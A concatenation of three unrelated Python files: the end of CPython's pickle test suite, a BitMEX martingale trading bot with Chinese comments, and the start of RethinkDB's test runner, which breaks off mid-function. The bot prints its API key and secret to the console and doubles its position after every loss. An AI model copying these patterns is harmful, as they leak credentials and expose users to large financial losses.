for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overriden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicity invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
runMartingale.py
|
import math
import datetime
from threading import Timer
from bitmex_websocket import Instrument
import asyncio
import websocket
import time
from bitmexClient import bitmexclient
def printlog(message):
timestr = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
with open('log.txt', 'a') as f:
s = timestr + ":" + message + "\n"
# s = str(s.encode("GBK"))
print(s)
f.write(s)
class BitmexWS:
def handleSupportAndPressurePrice(self, lastprice):
if lastprice < self.lowcontrolPriceline:
if self.bc.pos > 0 and self.cengshu >= 4:
# 关键点位上,持仓逆向,且层数过高,平仓避避风头
printlog(
"关键点位上,持仓逆向,且层数过高,平仓避避风头 self.bc.pos = " + str(self.bc.pos) + " self.cengshu = " + str(
self.cengshu))
self.orderClose()
return True
elif lastprice > self.highcontrolPriceline:
if self.bc.pos < 0 and self.cengshu >= 4:
printlog(
"关键点位上,持仓逆向,且层数过高,平仓避避风头 self.bc.pos = " + str(self.bc.pos) + " self.cengshu = " + str(
self.cengshu))
self.orderClose()
return True
def handlehaveLong(self, gap):
# 大于止盈点数,平仓
if gap > self.targetProfit:
printlog("持有多仓,超过盈利点数,平仓:" + str(gap))
self.orderClose()
# 处理多单亏损
else:
# 如果亏损超过初始设定,则加多仓
if gap < -self.init_jiacanggap:
printlog("持有多仓,亏损超过设定点数,加仓: " + str(gap))
self.order()
else:
pass
# print("持有多仓,不触发平仓和加仓 gap = "+str(gap))
def handlehaveShort(self, gap):
if gap < -self.targetProfit:
printlog("持有空仓,超过盈利点数,平仓:" + str(gap))
self.orderClose()
# 处理空单亏损
else:
# 价格上升到空仓开仓价格超过初始设定,则加空仓
if gap > self.init_jiacanggap:
printlog("持有空仓,亏损超过设定点数,加仓" + str(gap))
self.order()
else:
pass
# print("持有空仓,不触发平仓和加仓 gap = " + str(gap))
def onMessage(self, message):
a1 = message["data"]
b = 'lastPrice' in a1[0]
c = 'timestamp' in a1[0]
# 过滤 websocket 信息,只需要最新价格
if b and c:
lastprice = float(a1[0]['lastPrice'])
timestamp = a1[0]['timestamp']
# 同步状态
# sendToAll({
# "lastprice": lastprice
# })
# 如果存在仓位,gap就是当前仓位的盈利或者亏损的点数
gap = lastprice - self.bc.avgPrice
# 每十次websocket返回信息,就打印一次当前的状态信息
if self.n % 10 == 0:
printlog("lastprice = " + str(lastprice) + "self.bc.pos:" + str(self.prepos) + " gap = " + str(
gap) + " self.init_zhiying = " + str(self.targetProfit) + " self.cengshu = " + str(self.cengshu))
self.n = self.n+1
# 如果仓位变化了,那么一直请求获得最新的仓位,如果仓位跟本地的对比,有变化了,才继续执行
isshouldgo = self.isAfterOrderPosChange()
if isshouldgo == False:
return
# 处理价格到了设定好的压力位,支撑位,平仓
if self.handleSupportAndPressurePrice(lastprice) == True:
return
if self.prepos == 0:
printlog("无仓位立刻开仓")
self.order()
else:
# 为了处理没有仓位,gap会等于当前价格的时候
if gap > 1000:
return
# 当前持有多仓
if self.prepos > 0:
self.handlehaveLong(gap)
# 当前持有空仓
elif self.prepos < 0:
self.handlehaveShort(gap)
# 平仓
def orderClose(self):
self.isInOrder = True
self.bc.orderClose()
self.cengshu = 0
self.mypos = 0
self.init_jiacanggap = 10
self.isPosChange = True
# 下单
def order(self):
self.isInOrder = True
printlog("self.cengshu = " + str(self.cengshu))
if self.prepos == 0:
self.bc.orderauto(1)
else:
self.bc.orderauto(abs(self.prepos) * 2)
self.cengshu = self.cengshu + 1
self.isPosChange = True
def isAfterOrderPosChange(self):
# printlog(" isAfterOrderPosChange 仓位改变,等待"+str(self.isPosChange)+"self.prepos = "+str(self.prepos))
if self.isPosChange == True:
p = self.bc.getpos()
if self.prepos == p:
self.retryposchangetimes = self.retryposchangetimes + 1
if self.retryposchangetimes >= 10:
self.retryposchangetimes = 0
self.isPosChange = False
return True
printlog(" 仓位改变,等待")
return False
else:
printlog(" 仓位改变完毕")
self.prepos = p
self.retryposchangetimes = 0
self.isPosChange = False
return True
else:
return True
def __init__(self):
self.isRun = False
def stopRun(sef):
print('...')
def startRun(self, settingidc):
if(self.isRun):
return
self.isRun = True
print('开始运行', settingidc)
# 下限价格
self.lowcontrolPriceline = float(settingidc["low"])
print("self.lowcontrolPriceline", self.lowcontrolPriceline)
# 上限价格
self.highcontrolPriceline = float(settingidc["high"])
print("self.highcontrolPriceline", self.highcontrolPriceline)
# 赚了多少点就卖
self.targetProfit = float(settingidc["targetProfit"])
print("self.targetProfit", self.targetProfit)
# 每次加仓的价格间隔
self.init_jiacanggap = float(settingidc["priceGap"])
print("self.init_jiacanggap", self.init_jiacanggap)
# 初始仓位
self.initorderPos = float(settingidc["initPos"])
print("self.initorderPos", self.initorderPos)
API_KEY = settingidc["API_KEY"]
print("API_KEY", API_KEY)
API_SECRET = settingidc["API_SECRET"]
print("API_SECRET", API_SECRET)
print("1")
self.n = 0
self.retryposchangetimes = 0
self.isInOrder = False
self.isPosChange = False
self.cengshu = 0
websocket.enableTrace(True)
print("2")
self.XBTH17 = Instrument(symbol='XBTUSD',
# subscribes to all channels by default, here we
# limit to just these two
channels=['margin', 'instrument'],
# you must set your environment variables to authenticate
# see .env.example
shouldAuth=True)
print("3")
self.bc = bitmexclient(API_KEY, API_SECRET)
print("4")
pos = self.bc.getpos()
print("pos = ", pos)
self.prepos = pos
orderBook10 = self.XBTH17.get_table('instrument')
self.XBTH17.on('action', self.onMessage)
# 静态文件服务器
import http.server
import threading
httpd = http.server.HTTPServer(
('localhost', 8000),
http.server.SimpleHTTPRequestHandler
)
threading.Thread(target=httpd.serve_forever).start()
# http://localhost:8000/web/app.html
# websocket
import asyncio
import websockets
import json
stringify = json.JSONEncoder().encode
parse = json.JSONDecoder().decode
clients = []
bws = BitmexWS()
def sendToAll(obj):
str = stringify(obj)
for ws in clients:
asyncio.get_event_loop().create_task(ws.send(str))
async def hello(ws, path):
print('join')
clients.append(ws)
while True:
try:
str = await ws.recv()
print('recv')
bws.startRun(parse(str))
except:
print('exit')
clients.remove(ws)
break
asyncio.get_event_loop().run_until_complete(
websockets.serve(hello, 'localhost', 3000)
)
asyncio.get_event_loop().run_forever()
|
test_framework.py
|
#/usr/bin/env python
'''This test framework is responsible for running the test suite'''
from __future__ import print_function
from argparse import ArgumentParser
from os.path import abspath, join, dirname, pardir, getmtime, relpath
import curses
import fcntl
import fnmatch
import math
import multiprocessing
import os
import shutil
import signal
import struct
import subprocess
import sys
import tempfile
import termios
import threading
import time
import traceback
try:
import Queue
except ImportError:
import queue as Queue
import test_report, utils
default_test_results_dir = os.path.realpath(os.path.join(os.path.dirname(__file__), os.pardir, 'results'))
argparser = ArgumentParser(description='Run RethinkDB tests', add_help=False)
argparser.add_argument('-j', '--jobs', type=int, default=1,
help='The number of tests to run simultaneously (Default: 1)')
argparser.add_argument('-l', '--list', action='store_true',
help='List all matching tests')
argparser.add_argument('-o', '--output-dir',
help='Directory where the tests results and logs will be written (Default: %s/*)' % default_test_results_dir)
argparser.add_argument('-d', '--run-dir',
help="Directory where the tests will be run. Use this option to run the tests on another partition or on /dev/shm (Default: same as -o)")
argparser.add_argument('-r', '--repeat', type=int, default=1,
help='The number of times to repeat each test (Default: 1)')
argparser.add_argument('-k', '--continue', action='store_true', dest='kontinue',
help='Continue repeating even if a test fails (Default: no)')
argparser.add_argument('-a', '--abort-fast', action='store_true', dest='abort_fast',
help='Abort the tests when a test fails (Default: no)')
argparser.add_argument('-v', '--verbose', action='store_true',
help='Be more verbose when running tests. Also works with -l and -L (Default: no)')
argparser.add_argument('-t', '--timeout', type=int, default=1200,
help='Timeout in seconds for each test (Default: 600)')
argparser.add_argument('-L', '--load', nargs='?', const=True, default=False, metavar='DIR',
help='Load logs from a previous test (Default: no)')
argparser.add_argument('-F', '--only-failed', action='store_true', dest='only_failed',
help='Only load failed tests')
argparser.add_argument('-E', '--examine', action='append', metavar='GLOB',
help='Examine log files from a previous run')
argparser.add_argument('-T', '--tree', action='store_true',
help='List the files generated by a previous tests')
argparser.add_argument('filter', nargs='*',
help='The name of the tests to run, or a group of tests, or their negation with ! (Default: run all tests)')
argparser.add_argument('-g', '--groups', action='store_true',
help='List all groups')
argparser.add_argument('-H', '--html-report', action='store_true',
help='Generate an HTML report')
argparser.add_argument('-C', '--print-config', action='store_true',
help='Show the detected configuration')
argparser.add_argument('-n', '--dry-run', action='store_true',
help='Do not run any tests')
def run(all_tests, all_groups, configure, args):
""" The main entry point
all_tests: A tree of all the tests
all_groups: A dict of named groups
configure: a function that takes a list of requirements and returns a configuration
args: arguments parsed using argparser
"""
if args.groups and not args.list:
list_groups_mode(all_groups, args.filter, args.verbose)
return
filter = TestFilter.parse(args.filter, all_groups)
if args.load or args.tree or args.examine:
old_tests_mode(all_tests, args.load, filter, args.verbose, args.list, args.only_failed, args.tree, args.examine, args.html_report)
return
tests = all_tests.filter(filter)
reqs = tests.requirements()
conf = configure(reqs)
if args.print_config:
for k in conf:
print(k, '=', conf[k])
tests = tests.configure(conf)
filter.check_use()
if args.list:
list_tests_mode(tests, args.verbose, args.groups and all_groups)
return
if not args.dry_run:
testrunner = TestRunner(
tests, conf,
tasks=args.jobs,
timeout=args.timeout,
output_dir=args.output_dir,
run_dir=args.run_dir,
verbose=args.verbose,
repeat=args.repeat,
kontinue=args.kontinue,
abort_fast=args.abort_fast)
testrunner.run()
if args.html_report:
test_report.gen_report(testrunner.dir, load_test_results_as_tests(testrunner.dir))
if testrunner.failed():
return 'FAILED'
# This mode just lists the tests
def list_tests_mode(tests, verbose, all_groups):
if all_groups:
groups = {name: TestFilter.parse(patterns, all_groups) for name, patterns in all_groups.items()}
else:
groups = False
for name, test in tests:
if groups:
group_list = ', '.join(group for group in groups if groups[group].at(name.split('.')).match())
if group_list:
group_list = ' (' + group_list + ')'
else:
group_list = ''
if verbose:
print(name + group_list + ':')
for line in str(test).split('\n'):
print(" " + line)
else:
print(name + group_list)
# This mode lists the groups
def list_groups_mode(groups, filters, verbose):
if filters:
raise Exception('Cannot combine --groups with positional arguments')
for name, patterns in groups.items():
if not verbose:
print(name)
else:
print(name + ':')
for pattern in patterns:
print(' ', pattern)
# This mode loads previously run tests instead of running any tests
def old_tests_mode(all_tests, load, filter, verbose, list_tests, only_failed, tree, examine, html_report):
if isinstance(load, "".__class__):
load_path = load
else:
all_dirs = [join(default_test_results_dir, d) for d in os.listdir(default_test_results_dir)]
load_path = max([d for d in all_dirs if os.path.isdir(d)], key=getmtime)
print("Loading tests from", load_path)
tests = load_test_results_as_tests(load_path).filter(filter)
filter.check_use()
if only_failed:
tests = tests.filter(PredicateFilter(lambda test: not test.passed()))
if html_report:
test_report.gen_report(load_path, tests)
return
if list_tests:
list_tests_mode(tests, verbose, False)
return
view = TextView()
for name, test in tests:
if not test.passed():
status = 'FAILED'
elif test.killed():
status = 'KILLED'
else:
status = 'SUCCESS'
if verbose:
test.dump_log()
view.tell(status, name)
if tree:
for name in test.list_files():
if tree:
print(" " + name)
if examine:
for glob in examine:
for name in test.list_files(glob):
print()
print('===', name, '===')
test.dump_file(name)
def redirect_fd_to_file(fd, file, tee=False):
if not tee:
f = open(file, 'w')
else:
tee = subprocess.Popen(["tee", file], stdin=subprocess.PIPE)
f = tee.stdin
os.dup2(f.fileno(), fd)
# The main logic for running the tests
class TestRunner(object):
SUCCESS = 'SUCCESS'
FAILED = 'FAILED'
TIMED_OUT = 'TIMED_OUT'
STARTED = 'STARTED'
KILLED = 'KILLED'
def __init__(self, tests, conf, tasks=1, timeout=600, output_dir=None, verbose=False, repeat=1, kontinue=False, abort_fast = False, run_dir=None):
self.tests = tests
self.semaphore = multiprocessing.Semaphore(tasks)
self.processes = []
self.timeout = timeout
self.conf = conf
self.verbose = verbose
self.repeat = repeat
self.kontinue = kontinue
self.failed_set = set()
self.aborting = False
self.abort_fast = abort_fast
self.all_passed = False
timestamp = time.strftime('%Y-%m-%dT%H:%M:%S.')
if output_dir:
self.dir = output_dir
try:
os.mkdir(output_dir)
except OSError as e:
sys.exit("Could not create output directory (%s): %s" % (output_dir, str(e)))
else:
tr_dir = default_test_results_dir
try:
os.makedirs(tr_dir)
except OSError:
pass
self.dir = tempfile.mkdtemp('', timestamp, tr_dir)
if run_dir:
self.run_dir = tempfile.mkdtemp('', timestamp, run_dir)
else:
self.run_dir = None
self.running = Locked({})
if sys.stdout.isatty() and not verbose:
self.view = TermView(total = len(self.tests) * self.repeat)
else:
self.view = TextView()
def run(self):
tests_count = len(self.tests)
tests_launched = set()
tests_killed = set()
try:
print("Running %d tests (output_dir: %s)" % (tests_count, self.dir))
for i in range(0, self.repeat):
if len(self.failed_set) == tests_count:
break
for name, test in self.tests:
if self.aborting:
break
self.semaphore.acquire()
if self.aborting:
self.semaphore.release()
break
if self.kontinue or name not in self.failed_set:
id = (name, i)
subdir = name if self.repeat == 1 else name + '.' + str(i + 1)
dir = join(self.dir, subdir)
run_dir = join(self.run_dir, subdir) if self.run_dir else None
process = TestProcess(self, id, test, dir, run_dir)
with self.running as running:
running[id] = process
tests_launched.add(name)
process.start()
else:
self.semaphore.release()
self.wait_for_running_tests()
except KeyboardInterrupt:
self.aborting = True
except:
self.aborting = True
(exc_type, exc_value, exc_trace) = sys.exc_info()
print()
print('\n'.join(traceback.format_exception(exc_type, exc_value, exc_trace)))
print("\nWaiting for tests to finish...", file=sys.stderr)
self.wait_for_running_tests()
running = self.running.copy()
if running:
print("\nKilling remaining tasks...")
for id, process in running.items():
tests_killed.add(id)
process.terminate(gracefull_kill=True)
for id, process in running.items():
process.join()
self.view.close()
if len(tests_launched) != tests_count or tests_killed:
if len(self.failed_set):
print("%d tests failed" % len(self.failed_set))
if tests_killed:
print("%d tests killed" % len(tests_killed))
print("%d tests skipped" % (tests_count - len(tests_launched)))
elif len(self.failed_set):
print("%d of %d tests failed" % (len(self.failed_set), tests_count))
else:
self.all_passed = True
print("All tests passed successfully")
print("Saved test results to %s" % self.dir)
def wait_for_running_tests(self):
# loop through the remaining TestProcesses and wait for them to finish
while True:
with self.running as running:
if not running:
break
id, process = list(running.items())[0]
process.join()
with self.running as running:
try:
del(running[id])
except KeyError:
pass
else:
process.write_fail_message("Test failed to report success or failure status")
self.tell(self.FAILED, id)
def tell(self, status, id, testprocess):
name = id[0]
args = {}
if status == 'FAILED':
if not self.aborting and not self.verbose:
args = dict(error = testprocess.tail_error())
if self.abort_fast:
self.aborting = True
if status != 'STARTED':
with self.running as running:
del(running[id])
if status not in ['SUCCESS', 'KILLED']:
self.view.tell('CANCEL', self.repeat - id[1] - 1)
self.failed_set.add(name)
self.semaphore.release()
self.view.tell(status, name, **args)
def count_running(self):
with self.running as running:
return len(running)
def failed(self):
return not self.all_passed
# For printing the status of TestRunner to stdout
class TextView(object):
red = ''
green = ''
yellow = ''
nocolor = ''
def __init__(self):
self.use_color = utils.supportsTerminalColors()
if self.use_color:
try:
curses.setupterm()
setf = curses.tigetstr('setaf') or ''
bold = curses.tigetstr('bold') or ''
self.red = (curses.tparm(setf, 1) if setf != '' else '') + bold
self.green = (curses.tparm(setf, 2) if setf != '' else '') + bold
self.yellow = (curses.tparm(setf, 3) if setf != '' else '') + bold
self.nocolor = curses.tigetstr('sgr0') or ''
except Exception: pass
def tell(self, event, name, **args):
if event not in ['STARTED', 'CANCEL']:
print(self.format_event(event, name, **args))
def format_event(self, str, name, error=None):
if str == 'LOG':
return name
short = dict(
FAILED = (self.red , "FAIL"),
SUCCESS = (self.green , "OK "),
TIMED_OUT = (self.red , "TIME"),
KILLED = (self.yellow , "KILL")
)[str]
buf = ''
if self.use_color:
buf += short[0] + short[1] + " " + name + self.nocolor
else:
buf += short[1] + " " + name
if error:
buf += '\n' + error
return buf
def close(self):
pass
# For printing the status to a terminal
class TermView(TextView):
statusPadding = 5 # some padding to the right of the status lines to allow for a little buffer for window resizing
columns = 80
clear_line = "\n"
def __init__(self, total):
super(TermView, self).__init__()
self.running_list = []
self.buffer = ''
self.passed = 0
self.failed = 0
self.total = total
self.start_time = time.time()
self.printingQueue = Queue.Queue()
try:
# curses.setupterm is already called in super's init
self.columns = struct.unpack('hh', fcntl.ioctl(1, termios.TIOCGWINSZ, '1234'))[1]
signal.signal(signal.SIGWINCH, lambda *args: self.tell('SIGWINCH', args))
self.clear_line = curses.tigetstr('cr') + (curses.tigetstr('dl1') or curses.tigetstr('el'))
except Exception: pass
self.thread = threading.Thread(target=self.run, name='TermView')
self.thread.daemon = True
self.thread.start()
def tell(self, *args, **kwargs):
self.printingQueue.put((args, kwargs))
def close(self):
self.printingQueue.put(('EXIT',None))
self.thread.join()
def run(self):
while True:
try:
args, kwargs = self.printingQueue.get(timeout=1)
except Queue.Empty:
if self.clear_line != self.__class__.clear_line: # if we can't clear the line, don't print every second
self.update_status()
self.flush()
else:
if args == 'EXIT':
break
self.thread_tell(*args, **kwargs)
def thread_tell(self, event, name, **kwargs):
if event == 'SIGWINCH':
self.columns = struct.unpack('hh', fcntl.ioctl(1, termios.TIOCGWINSZ, '1234'))[1]
self.update_status()
elif event == 'CANCEL':
self.total -= name
elif event == 'STARTED':
self.running_list += [name]
self.update_status()
else:
if event == 'SUCCESS':
self.passed += 1
else:
self.failed += 1
self.running_list.remove(name)
self.show(self.format_event(event, name, **kwargs))
self.flush()
def update_status(self):
self.clear_status()
self.show_status()
def clear_status(self):
self.buffer += self.clear_line
def show_status(self):
if self.running_list:
running = len(self.running_list)
remaining = self.total - self.passed - self.failed - running
duration = self.format_duration(time.time() - self.start_time)
def format(names, useColor=self.use_color):
